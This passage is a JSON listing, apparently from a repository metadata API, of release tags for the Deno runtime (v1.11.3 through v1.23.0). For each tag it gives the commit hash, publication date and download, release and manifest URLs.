d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland